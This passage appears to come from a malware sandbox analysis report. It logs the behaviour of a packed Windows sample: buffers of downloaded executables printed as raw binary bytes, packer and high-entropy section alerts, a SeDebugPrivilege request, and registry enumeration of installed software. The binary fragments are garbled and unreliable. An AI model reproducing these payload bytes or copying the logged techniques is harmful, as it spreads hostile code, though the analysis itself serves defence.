buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELò€dà ^’PŠX @ ÀxÃn5:@P`”Û ` 4 ` |Ž€š8@@ Ò@B.idata @Ô@À.rsrcÜ`ÜÖ@@.themida@8@ ²`à.boot6 €X6 ²``¥ˆ>Ñ5² šî²MÏè'ÒeÜZ˅³Žë»·`™@G5ábË[¶PÜ»eMRÎè®c妣Ö•«òXÂÚiÕÌDôá²=£[ÕÑØ·AÎË!®i6ÃÒj?8ÄÂàøɒ(,°#D)c‰Þ9,¤—[W?‹EÂxX×k²7˜´OA!C½ÛùEÉ*Íj¦šEnŸÖ4ÏGWÕIÊ*—ɌìŸeøÌ£½ÛãI85;ìïeª[ô2œ>/˝i™JL™¤8Íz Ïåà^/§l ÈÍEÒÈ¥£L…âi T œV§kCåvf1álõ“§#k³GÏëÎ+2£ƒilFee€_ #¡ó+Tó.ªr3Æ´=Ô87Otü¤!ç=©ÄìñÒ»»<k"­c•³Âï–FäT;ü:B¯J̵“ż©-۝z#üã–AõýR=Óh»DÚü¦'ìÍwÖÉ+ó&tå¥ÇF¯FIš&¤ »|"ëNf#ò…Mì3Ȥ{0ÜéNhhØ~3Öød“¶Ö²¹­²ö©?à ·Æ^û‚,õ~\¯­Ã”\ƒWÙ¥¶G«‘œž/é!õ^ÿNZ€æëS‹ËZu®â„vÍo0sÓü„ÃêW‰÷ςßäðFÐP &¡*pwÓ"2Õø—n¼HHŸ¡\Ö2­ÿiûwÔã„Dçí†JÓïWÞ},« µo7*'P 'ͶÈWpdÅvÞZ­S9¿ôS]¯‚ü‘ÀÖîíîôDžü¼˜ãëÖ ÷#H½‘g BŶ//!í½ÝŸÉß·!ðó‹m rs Qª+ÏÁÄêíp‡Ô3̲Ãȗ:λ™)°jj]cž dW~±çúð8™7ó[e—<a,˜2k|g}iÐÔ"-9³ ¡É3é•lÆÔo¨€ ¾…ÍHKjÛÆ6"O΍ħÒǪÌ^ãlJÎû6*Ž5àËð¿¦ÑóLÃÃ9[ÖpµqÀÍÒ+ùsþþ% åÕh½Jí¼WüÕ6„ö›RÉ-µVë\–s„TAOÎï©KÂü!Þ5ÖvaæÄwµºVñ¹U»-šöü fÅø­JŒeKÇ£Ë+ÉÓ gÍX0G4”¨xµ’Ór]kó¶è¸W.äpkØNÏç»eͼœi»ªm®Ëõø› …3‚׳ÅÉú>ú3ãNY:¾µ!Ǝžè_»ãhGõYNö¯ñF"¾îŽòšÆ+9¡\×öZ :•R¡Þ^q1´H̲È}8fx÷Ëo.ø¹ÂeÅjKiOÙ¼§Éç¢!,‘®·í—<¬Ãé‘nc9'©èYˆ†áyH ¢L‹íË_÷AçK«ý Š-­ÂPÒh™¿Å¼àT^6@ÈÔ?iÚwëtzè`ÕQ/a÷ú‘d€ÍjïÉ+@Ô<zïógÒÙeë«íºÕ¼fHrOSñiW§bqxl{Gø‚÷J¯\Õ`±Vmây݁ C )6é]½:¢²ÜžÄW‘Pà •‰á/²|Êsâ½LjZð|òíɜ%lb½‡7;VúK@”³É«Š ÄðG$8ϒì éßh(¨V­­8”ÿRlÉÎl¡¬s‡Oü~ߋëÑC çó}¾tüK—ßÍC/¯û§9)Œ]1Ëøúpׂ:1 ³‹Ö}ù~É}RÃ2  Ù%ûPñ.5k3ê!s³ékGiцؾ½Z)EvÐðëºR?¯'ƒ>]#ÅËûÀÂçAӐqא…£ÂÅ­]¼ñžï¾ËGÊÒÉ6½(ïCdwJP©Ë-÷¼îZXÌtPÏRoÓŲ㌥Ž ÞæFÚ÷µ½ÂE.AÝ ]bˆ:3Ђ\,»”eóÄ£,¨—@Ë×EôÚ;š¢Uü Ñßt‚Ðô‚µ‰¶¢÷õ8+j§Ž@‡)à‘*ºloù(ÝæÉ)Kª.”x„Þ;y%TC¶[œù¯rìÎÕ|¥ZCú´U-ŠMo7Ló'EfÚ¼[_¥¢DXË»¾‡mí~Ĕi¤¨¯] Él{Y?™œÏqœÔ·×?¦Òàt€O^õ:ßñTL–®¨aÌ:׫#^Q…n,Ñlm+yDÕÎûÜA³\ª¡›ÿa݀Ҭ ËÀæP„øþÐZÅ8Éø&î*fÁ éÏûÌf@ziE'ÖÅLÓSµÔ"dƒ ¥$9xUäµSiw—TÔþœÃ–Í­˜CÆñð2AqÓTÄ¢öä*»óò1ÊVeimQë:mß`«CHÅ{8vvíX¡Pù*©s;í‡\q´*Ç­X“ÃáØj¹Sð*ÿ^o!w–ø†}mÿÏä(äJ«™Â»îŠN>Þ ÏV;ÿQø¶Þª ^sKŸX®º½@ðñÑî娛}TYøw¬w¥¬Mñ¿ÐaùsÚÊT0!\ٖJ üR3Rt™þ…Î 8Ëäö4O «rgE5(±GÃ3 ‡¨¹vj‡ÞJ2R ÊK¥ƒ7Ò2¤^-×î4Éß9¯$X!03$ˆöֈØD؝nÁßM¡ä5S밐‚ÒˆM¶á¯Ïh§)‘3)}‰ºî”„­Îxc4"¸#3•„ê‡®ÎK¦Ñ~#Øí¨\×Uú+pMî­¬©œ>¸\Õ©ññB v±QºqBÙѪD ©–U«ÎýjLâÂCˆôYس3FÜÇ»üJprfôðc}¬h„&*"§ïéÏÔCsk¬}ó WP—Neh) ”;£Œ\Ēî¦3"Rbr†»±aÐj¯êf CY¸=;÷1x±¦{ÑEK’óÉA\SÄÝ |Q¶&REœÅÉp®¿±(°S¸eh{ ‘ÇÝ:¼9–Þà2ꑔº0òÕèŵˆ¨°® h½(éhìÍ0ÆS¢v}ÁQN‡:©µ.c4S’Ô™”xyhÛ©‹¯Ñèˆ÷ðYZãxJtõä•áeЈ¡dÏuˆ"ìçZªDhUïïÓÜò(!ìî5*ðÂÎðúèx¾tº|o<^]ùKÍGÀM†ÚQQõÔ£mü…+i,DçýŸ‚ µßÔN‰óZÙâŒ!:(Â[0ÀõدTð+Jç2$É?#\ä¶#Ec¸¶_ã x§Ïá[;œD”û§"§áiÏ~•Óô¢Y{üõÓô³eÕÝôÙ)íؽXÐÚÄ áIàôi‰]÷ŒK è´cÝNJb‡»'nÆ?Fä¤myڛ³5Lö§f’Þ*j‚p÷!ùbØÉ\‘Ôþ…5Ќê̸9î캯‰÷´‘Õðpµ¦ùâiڝ WËõÅòÌ&­ÓQ-¢j ~^kW£|º9£p /ÌÅu•½Å~L$[ÆÝÑÐgSB¸gkÄ)†Hܑ¶w[z2}({²§eU×è²c8αµ’_ÆáúbÕÐdÒÆr´&6ËÎVwªJ՘âí€axg@6¹iÑы­?>ÕF+×Ûf3Hº¬9£oïæ}º×ã8pÀK`ù[÷‚ÎÁÝ4§ÎtSk;…;ºb²k€#§Å3™Qi÷QҜÀj»±VØçKß ËjãµUÖÝ1P÷ŒEFaô`²RÄñF¹½mK0§ËÆ9=u¦÷I´yõÍx&òòÅs·\Àiç–e~-ªw¶x.×LNý†;»í úú™Ïôñ]h"æfHŋ»ÂÑÏI¯Cç„Kâ;¸~ÐÇDÆ©ÁÊÔFk§\SÍl§ç—8iœ¾ÌsQê…Ü{Vø¦gñØS >‡œÕÖê;ã2mjÐý *õªlÄ×Ýæd}×¢"Ô­ÝÅPÇN¸j_·)REÚMˆ œ'a½/¢žPÝqk$7UþKÎÿš|Óü›okŸ`ËÍot҉ÿpo+e¡*Ã=©ôp6>V@×ö¤cFR Y ]o¬°”ÏŽc¬Aìfø½úŸyÜ<µXËǟÔâhIQ¦ c;ÇòÈøpH ?,ž~sg’&d®ûŽehµòÁñímq×Ý`p
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $‘†ÕçsOÕçsOÕçsOŽwNÇçsOŽpNÞçsOŽvNeçsOŠvNçsOŠwNÚçsOŠpNÜçsOŽrNØçsOÕçrOiçsON‰zNÑçsON‰sNÔçsON‰ŒOÔçsON‰qNÔçsORichÕçsOPEd†œ{wdð"  ¾8 €0`­Xè­ŒøPd›Ì`ÝpÐÝ0 À.textH   `.rdatȃ0 ’ @@.dataLuÐ<ª@À.pdatad›Pœæ@@_RDATA”ð‚@@.rsrcø„@@.reloc̆@BHƒì(A¸ HG»H  êècl H ló HƒÄ(éŸï ÌÌÌHƒì(A¸ H?»H ïè3l H ¬ó HƒÄ(éoï ÌÌÌHƒì(A¸H3»H  ïèl H ìó HƒÄ(é?ï ÌÌÌHƒì(A¸ H»H ðêèÓk H ,ô HƒÄ(éï ÌÌÌHƒì(A¸H»H `îè£k H lô HƒÄ(éßî ÌÌÌHƒì(A¸HïºH 0éèsk H ¬ô HƒÄ(é¯î ÌÌÌHƒì(E3ÀHÂH £îèFk H ïô HƒÄ(é‚î ÌÌÌÌÌÌHƒì(E3ÀH’H Óîèk H /õ HƒÄ(éRî ÌÌÌÌÌÌHƒì(E3ÀHbH #êèæj H oõ HƒÄ(é"î ÌÌÌÌÌÌHƒì(E3ÀH2H 3èè¶j H ¯õ HƒÄ(éòí ÌÌÌÌÌÌHƒì(A¸HºH €èèƒj H ìõ HƒÄ(é¿í ÌÌÌHƒì(A¸Hÿ¹H PéèSj H ,ö HƒÄ(éí ÌÌÌHƒì(A¸ Hï¹H ëè#j H lö HƒÄ(é_í ÌÌÌHƒì(A¸HϹH ëèói H ¬ö HƒÄ(é/í ÌÌÌHƒì(A¸H«¹H €éèÃi H ìö HƒÄ(éÿì ÌÌÌHƒì(A¸H‡¹H Pêè“i H ,÷ HƒÄ(éÏì ÌÌÌHƒì(A¸Ho¹H ìèci H l÷ HƒÄ(éŸì ÌÌÌHƒì(A¸ HO¹H pìè3i H ¬÷ HƒÄ(éoì ÌÌÌHƒì(A¸LH/¹H àèèi H ì÷ HƒÄ(é?ì ÌÌÌHƒì(A¸HO¹H 0æèÓh H ,ø HƒÄ(éì ÌÌÌHƒì(A¸dH?¹H  íè£h H lø HƒÄ(éßë ÌÌÌHƒì(A¸Hw¹H Pìèsh H ¬ø HƒÄ(é¯ë ÌÌÌHƒì(A¸H_¹H `êèCh H ìø HƒÄ(éë ÌÌÌHƒì(A¸ HO¹H °åèh H ,ù HƒÄ(éOë ÌÌÌHƒì(A¸ H/¹H àêèãg H lù HƒÄ(éë ÌÌÌHƒì(A¸(H¹H péè³g H ¬ù HƒÄ(éïê ÌÌÌHƒì(A¸ H¹H  ëèƒg H ìù HƒÄ(é¿ê ÌÌÌHƒì(A¸ Hï¸H ðìèSg H ,ú HƒÄ(éê ÌÌÌHƒì(A¸HϸH @êè#g H lú HƒÄ(é_ê ÌÌÌHƒì(A¸H¯¸H Pëèóf H ¬ú HƒÄ(é/ê ÌÌÌHƒì(A¸ HŸ¸H çèÃf H ìú HƒÄ(éÿé ÌÌÌHƒì(A¸,H¸H Ðçè“f H ,û HƒÄ(éÏé ÌÌÌHƒì(A¸H¸H àæècf H lû HƒÄ(éŸé ÌÌÌHƒì(A¸ Ho¸H 0êè3f H ¬û HƒÄ(éoé ÌÌÌHƒì(A¸$HO¸H €êèf H ìû HƒÄ(é?é ÌÌÌHƒì(A¸HG¸H °çèÓe H ,ü HƒÄ(éé ÌÌÌHƒì(A¸H/¸H àâè£e H lü HƒÄ(éßè ÌÌÌHƒì(A¸H¸H ðçèse H ¬ü HƒÄ(é¯è ÌÌÌHƒì(A¸ H¸H àäèCe H ìü HƒÄ(éè ÌÌÌHƒì(A¸ Hï·H èèe H ,ý HƒÄ(éOè ÌÌÌHƒì(A¸ Hç·H Àåèãd H lý HƒÄ(éè ÌÌÌHƒì(A¸ H·H ãè³d H ¬ý HƒÄ(éïç ÌÌÌHƒì(A¸H¯·H åèƒd H ìý HƒÄ(é¿ç ÌÌÌHƒì(A¸H—·H pâèSd H ,þ HƒÄ(éç ÌÌÌHƒì(A¸ Hw·H Àèè#d H lþ HƒÄ(é_ç ÌÌÌHƒì(A¸LH´H Påèóc H ¬þ HƒÄ(é/ç ÌÌÌHƒì(A¸H'·H @åèÃc H ìþ HƒÄ(éÿæ ÌÌÌHƒì(A¸dH/´H ðåè“c H ,ÿ HƒÄ(éÏæ ÌÌÌHƒì(A¸H׶H €èècc H lÿ HƒÄ(éŸæ ÌÌÌHƒì(A¸H¿¶H pçè3c H ¬ÿ HƒÄ(éoæ ÌÌÌHƒì(A¸ H§¶H åèc H ìÿ HƒÄ(é?æ ÌÌÌHƒì(A¸H‡¶H 0âèÓb H , HƒÄ(éæ ÌÌÌHƒì(A¸H_¶H àçè£b H l HƒÄ(éßå ÌÌÌHƒì(A¸H7¶H äèsb H ¬ HƒÄ(é¯å ÌÌÌHƒì(A¸H¶H €âèCb H ì HƒÄ(éå ÌÌÌHƒì(A¸HïµH Ðàèb H , HƒÄ(éOå ÌÌÌHƒì(A¸?H¶H äèãa H l HƒÄ(éå ÌÌÌH É éå ÌÌÌÌH ) éå ÌÌÌÌH ‰ éðä ÌÌÌÌH é éàä ÌÌÌÌH I éÐä ÌÌÌÌHƒì(E3ÀHâH àèfa H  HƒÄ(é¢ä ÌÌÌÌÌÌH é éä ÌÌÌÌH I é€ä ÌÌÌÌH © épä ÌÌÌÌH  é`ä ÌÌÌÌH i éPä Hƒì(H ¹ïè¤í H ¹ HƒÄ(é0ä H µ é$ä H  éä H 9 é ä Hƒì(H Eóè`í H e HƒÄ(éìã ¸ÃÌÌÌÌÌÌÌÌÌÌH‰\$H‰l$H‰t$ W
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $,CyáCyáCyáâ~Iyáä~Ëyáå~Qyá–å~Lyá–â~Ryá–ä~byáà~FyáCyàyáØè~@yáØá~ByáØByáØã~ByáRichCyáPELž{wdà! ތ>ð°@ Jœ<K<€øT ?p?@ð,.textVÝÞ `.rdataîaðbâ@@.dataD` D@À.rsrcø€P@@.relocTR@Bj h¨<¹phè?#hêèŒ*YÃÌÌÌj,hÌ<¹ˆhè#h`êèl*YÃÌÌÌj,hÌ<¹ hèÿ"hÀêèL*YÃÌÌÌj,hÌ<¹¸hèß"h ëè,*YÃÌÌÌj8hü<¹Ðhè¿"h€ëè *YÃÌÌÌj<h8=¹èhèŸ"hàëèì)YÃÌÌÌj0hx=¹iè"h@ìèÌ)YÃÌÌÌh€h°=¹iè\"h ìè©)YÃj?h€>¹0iè?"híèŒ)YÃÌÌ̋ÁÂÌÌÌÌÌÌÌÌÌÌÌU‹ìV‹ñWÀFPÇ”ñf֋EƒÀPèÂ2ƒÄ‹Æ^]ÂÌÌ̋I¸|<…ÉEÁÃÌÌU‹ìV‹ñFÇ”ñPèó2ƒÄöEt j Vè«%ƒÄ‹Æ^]AÇ”ñPèÉ2YÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌWÀ‹ÁfÖAÇA<ÇìñÃÌÌÌÌÌÌÌÌU‹ìƒì MôèÒÿÿÿhˆJEôPè›2ÌÌÌÌU‹ìV‹ñWÀFPÇ”ñf֋EƒÀPèò1ƒÄÇìñ‹Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìV‹ñWÀFPÇ”ñf֋EƒÀPè²1ƒÄÇ ñ‹Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìQS‹ZVWQS‹ñè‹=€h3É3À‰}ü…Û~53Ò;NjþEЃ=„h¸phCphƒ~r‹>ŠˆA‹}üB;Ë|˃~r‹_Æ‹Æ^[‹å]Ã_Æ‹Æ^[‹å]ÃÌÌÌÌÌU‹ìƒìSVW‹ò‹ùQ‰}ô‹FP‰Eðè“3ۉ]ø9]ðŽ)Dƒ~‹Ær‹¾Pè¯KƒÄ…Àu-‹N‹Æƒùr‹€< t‹Æƒùr‹ƒ‹Ïr‹Šé̃~‹Ær‹‹=@i3ҋ Di…ÿt+ŠˆEÿfDŠ]ÿƒù¸0iC0i8‹]øtB;×ráƒÊÿ‹E‹Èƒxr‹3À…ÿt.Š ˆMÿDƒ=Di¹0iŠ]ÿC 0i8‹]øt@;Çr݃Èÿƒ=Di¹0iC 0i‰Mì‹Mô‰Møƒyr‹ ‰Mø‹Ï+ȍ 3Ò÷÷‹Mì‹}ôŠ ‹MøˆC‰]ø;]ðŒÜþÿÿƒr‹Æ‹Ç_^[‹å]ÃÆ‹Ç_^[‹å]ÃÌÌÌÌÌÌÌÌÌÌU‹ìƒì@SVW‹Ù‹òQMĉ]ôèçýÿÿEċÖPMÜèYþÿÿhÇCÇCÆè°"‹Ø¹ƒÈÿ‰]ø‹ûƒÄ ó«3Ò„¾Š8>‰‹Bƒú@|ð‹Uì3ö3ۍ~ø…ÒtA‹Møƒ}ðEÜCEܾ‹ƒøÿt'ÁæðƒÇx‹Ï‹ÆÓø‹MôPè‹Uìƒï‹MøC;Úr‹Eø…ÀthPèð!ƒÄ‹Uðƒúr(‹MÜB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwVRQèÀ!ƒÄ‹UØÇEìÇEðÆE܃úr(‹MÄB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwRQè~!ƒÄ‹Eô_^[‹å]Ãè›GÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì4‹E0SVW3ÿÆEè¾…À„‹]ÇEàÇEäÆEÐ;Ç‚´+ǍMÐ;ÃB؃}4E CE SÇPèƒþr.‹MèV‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡hRQè× ƒÄMЃ}Uó~EàEèCUƒ}ä‹uà‹]f~ÉMèCÁfÖEø;óu\ƒîr‹; uƒÀƒÂƒîsïƒþü„îŠ: u7ƒþý„ߊH:Ju&ƒþþ„ΊH:Juƒþÿ„½Š@:B„±‹E0G‹uü;ø‚õþÿÿ3ÿ‹Uƒþr/‹MèF‹Áþr‹IüƒÆ#+ÁƒÀüƒø‡’VQè ‹UƒÄ‹Eƒør'H‹Âùr‹RüƒÁ#+ƒÀüƒøw`QRèσċU4ÇEÇEÆEƒúr3‹M B‹Áúr‹IüƒÂ#+ÁƒÀüƒøwë ‹uüGéWÿÿÿRQ肃ċÇ_^[‹å]Ãè Eè«ÌÌÌÌÌÌÌÌÌÌÌU‹ìQS‹]V‹ñ‰]üWjhÀ>ÇFÇFÆèD3ÿ…Û~1ƒ}ECEŠ8S¿C €ú¶È¶ÃGȶÁ‹ÎPèG;}ü|ϋUƒúr(‹MB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwRQèуÄ_‹Æ^[‹å]ÃèïDÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì0VWj$hÄ>MÐÇEàÇEäÆEÐè—‹E…Àu3öéÇ3ÿ…À„¸ÇEøÇEüÆEè;Ç‚F+ǹ;ÁBȃ}ECEQǍMèPèBƒìEЋÌPètƒìEè‹ôƒì‹ÌPèa‹ÎèªþÿÿƒÄè¢üÿÿ‹UüƒÄ0…À„šƒúr,‹MèB‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡¹RQèǃċEG;ø‚Hÿÿÿ¾‹Uäƒúr(‹MÐB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwxRQ膃ċUƒúr^‹MB‹ÁúrF‹IüƒÂ#+ÁƒÀüƒøwHë4ƒúr(‹MèB‹Áúr‹IüƒÂ#+ÁƒÀüƒøw#RQè1ƒÄ3öétÿÿÿRQè ƒÄ_‹Æ^‹å]Ãè?CèJÌÌÌÌÌÌÌÌÌÌU‹ìQ‹E‹U‹MV…À„‚S@WPè] ƒÄMƒ}‹Ø‹ÓCM+ъIˆD ÿ„Àuó‹óNŠF„Àuù+ñFVjÿðV‹øSWÿðPèÇ5ƒÄ WÿðjÿñÿñWjÿñÿ ñ‹U‹M_[^ƒúr%B‹Áúr‹IüƒÂ#+ÁƒÀüƒøwRQèAƒÄ‹å]ÃèdBÌÌÌÌU‹ìƒì$SVW‹ùjÇGÇGÆÿñ…À„‡j ÿ$ñ‹Ø‰]ü…Û„lSÿð‰Eô…À„SjjjjjÿPjhéýÿ ð‹ð‰uø…öŽ.‹WN;Êw‰O‹Çƒr‹ÆëF‹G‹Ù+Ú+Â;Øw%ƒ‹Ç‰Or‹S4jVèE,ÆƒÄ ‹uøëQSÆEø‹ÏÿuøS訋]üƒ‹Çr‹jjVPjÿÿuô
request_handle: 0x00cc000c
1 1 0
section {u'size_of_data': u'0x003a8200', u'virtual_address': u'0x00001000', u'entropy': 7.999953920275578, u'name': u'.MPRESS1', u'virtual_size': u'0x00789000'} entropy 7.99995392028 description A section with a high entropy has been found
entropy 0.987083168578 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
process system
Time & API Arguments Status Return Repeated

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
base_handle: 0x80000002
key_handle: 0x00000434
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
1 0 0

RegOpenKeyExW

regkey_r: 7-Zip
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip
1 0 0

RegOpenKeyExW

regkey_r: AddressBook
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
1 0 0

RegOpenKeyExW

regkey_r: Adobe AIR
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR
1 0 0

RegOpenKeyExW

regkey_r: Connection Manager
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
1 0 0

RegOpenKeyExW

regkey_r: DirectDrawEx
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
1 0 0

RegOpenKeyExW

regkey_r: EditPlus
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
1 0 0

RegOpenKeyExW

regkey_r: Fontcore
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
1 0 0

RegOpenKeyExW

regkey_r: Google Chrome
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
1 0 0

RegOpenKeyExW

regkey_r: Haansoft HWord 80 Korean
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
1 0 0

RegOpenKeyExW

regkey_r: IE40
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40
1 0 0

RegOpenKeyExW

regkey_r: IE4Data
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
1 0 0

RegOpenKeyExW

regkey_r: IE5BAKEX
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
1 0 0

RegOpenKeyExW

regkey_r: IEData
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData
1 0 0

RegOpenKeyExW

regkey_r: MobileOptionPack
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
1 0 0

RegOpenKeyExW

regkey_r: Mozilla Thunderbird 78.4.0 (x86 ko)
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)
1 0 0

RegOpenKeyExW

regkey_r: Office15.PROPLUSR
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR
1 0 0

RegOpenKeyExW

regkey_r: SchedulingAgent
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
1 0 0

RegOpenKeyExW

regkey_r: WIC
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC
1 0 0

RegOpenKeyExW

regkey_r: {00203668-8170-44A0-BE44-B632FA4D780F}
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}
1 0 0

RegOpenKeyExW

regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
1 0 0

RegOpenKeyExW

regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980}
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}
1 0 0

RegOpenKeyExW

regkey_r: {26A24AE4-039D-4CA4-87B4-2F32180131F0}
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}
1 0 0

RegOpenKeyExW

regkey_r: {4A03706F-666A-4037-7777-5F2748764D10}
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}
1 0 0

RegOpenKeyExW

regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-0015-0409-0000-0000000FF1CE}
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-0016-0409-0000-0000000FF1CE}
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-0018-0409-0000-0000000FF1CE}
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-0019-0409-0000-0000000FF1CE}
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-001A-0409-0000-0000000FF1CE}
base_handle: 0x00000434
key_handle: 0x00000438
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

regkey_r: {90150000-001B-0409-0000-0000000FF1CE}
base_handle: 0x00000434
